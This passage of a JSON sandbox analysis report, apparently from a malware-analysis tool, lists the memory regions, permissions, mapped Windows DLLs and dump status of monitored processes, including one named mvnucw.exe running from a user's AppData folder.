"ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 270336, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4464639, "entry_point": 0, "filename": null, "id": "region_1033", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:27.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_1034", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:30.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1965948928, "type": "region", "version": 1 }, "end_va": 1967374335, "entry_point": 1965948928, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1035", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1965948928, "timestamp": "00:01:30.657", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winapp\\Mvnucw.exe\"", "filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\mvnucw.exe", "id": "proc_7", "image_name": "mvnucw.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001036-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1036", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:35.909", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001037-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1037", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:35.909", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1038", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:35.909", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001039-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1039", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:35.912", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001040-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1040", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:35.913", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001041-addr_0x0000000000400000-size_0x0000000000076000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 483328, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4677631, "entry_point": 4194304, "filename": "\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winapp\\Mvnucw.exe", "id": "region_1041", "name": "mvnucw.exe", "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\mvnucw.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:35.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1042", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:01:35.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2003959808, "type": "region", "version": 1 }, "end_va": 2005532671, "entry_point": 2003959808, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1043", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003959808, "timestamp": "00:01:35.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1044", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:35.915", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001045-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1045", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:35.915", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001046-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1046", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:35.918", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001047-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1047", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:35.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1048", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:35.919", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001049-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1049", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:35.919", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1050", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:35.919", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_1051", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:35.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_1052", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:35.929", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001053-addr_0x0000000000260000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_1053", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:35.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1942224896, "type": "region", "version": 1 }, "end_va": 1942601727, "entry_point": 1942484888, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1054", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1942224896, "timestamp": "00:01:35.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1942618112, "type": "region", "version": 1 }, "end_va": 1942876159, "entry_point": 1942806136, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1055", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1942618112, "timestamp": "00:01:35.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1943076864, "type": "region", "version": 1 }, "end_va": 1943109631, "entry_point": 1943085304, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1056", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1943076864, "timestamp": "00:01:35.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1057", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:35.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2191359, "entry_point": 1769472, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1058", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1769472, "timestamp": "00:01:35.961", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001059-addr_0x0000000000360000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1059", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:35.962", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001060-addr_0x0000000000530000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_1060", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:01:35.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1965490176, "type": "region", "version": 1 }, "end_va": 1965539327, "entry_point": 1965494497, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1061", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1965490176, "timestamp": "00:01:35.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1965555712, "type": "region", "version": 1 }, "end_va": 1965948927, "entry_point": 1965663155, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1062", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1965555712, "timestamp": "00:01:35.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1967390720, "type": "region", "version": 1 }, "end_va": 1968373759, "entry_point": 1967457641, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1063", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967390720, "timestamp": "00:01:35.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1971191808, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971304173, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1064", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1971191808, "timestamp": "00:01:35.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972830208, "type": "region", "version": 1 }, "end_va": 1972932607, "entry_point": 1972849013, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1065", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972830208, "timestamp": "00:01:35.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1066", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:01:35.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1976631296, "type": "region", "version": 1 }, "end_va": 1977335807, "entry_point": 1976673394, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1067", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1976631296, "timestamp": "00:01:35.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1977352192, "type": "region", "version": 1 }, "end_va": 1978466303, "entry_point": 1977430739, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1068", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1977352192, "timestamp": "00:01:35.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1979580416, "type": "region", "version": 1 }, "end_va": 1992466431, "entry_point": 1980110337, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1069", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1979580416, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1995505664, "type": "region", "version": 1 }, "end_va": 1995862015, "entry_point": 1995611046, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1070", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1995505664, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1996398591, "entry_point": 1996371616, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1071", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:01:35.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1998020607, "entry_point": 1997763704, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1072", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:35.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1998061568, "type": "region", "version": 1 }, "end_va": 1998704639, "entry_point": 1998274519, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1073", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1998061568, "timestamp": "00:01:35.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1999110144, "type": "region", "version": 1 }, "end_va": 1999765503, "entry_point": 1999194597, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1074", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1999110144, "timestamp": "00:01:35.969", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001075-addr_0x0000000077320000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 0, "filename": null, "id": "region_1075", "name": "private_0x0000000077320000", "norm_filename": null, "region_type": "private_memory", "start_va": 1999765504, "timestamp": "00:01:35.970", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001076-addr_0x0000000077440000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 0, "filename": null, "id": "region_1076", "name": "private_0x0000000077440000", "norm_filename": null, "region_type": "private_memory", "start_va": 2000945152, "timestamp": "00:01:35.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1077", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:35.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1078", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:35.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 8093695, "entry_point": 0, "filename": null, "id": "region_1079", "name": "pagefile_0x0000000000630000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6488064, "timestamp": "00:01:35.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1975255040, "type": "region", "version": 1 }, "end_va": 1976090623, "entry_point": 1975260811, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1080", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1975255040, "timestamp": "00:01:35.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1995964416, "type": "region", "version": 1 }, "end_va": 1996357631, "entry_point": 1996035471, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1081", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1995964416, "timestamp": "00:01:35.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001082-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1082", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:35.983", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001083-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1083", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:35.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 9703423, "entry_point": 0, "filename": null, "id": "region_1084", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:01:35.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_1085", "name": "pagefile_0x0000000000950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9764864, "timestamp": "00:01:35.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1940389888, "type": "region", "version": 1 }, "end_va": 1940914175, "entry_point": 1940469705, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1086", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1940389888, "timestamp": "00:01:35.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_1087", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:01:35.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created 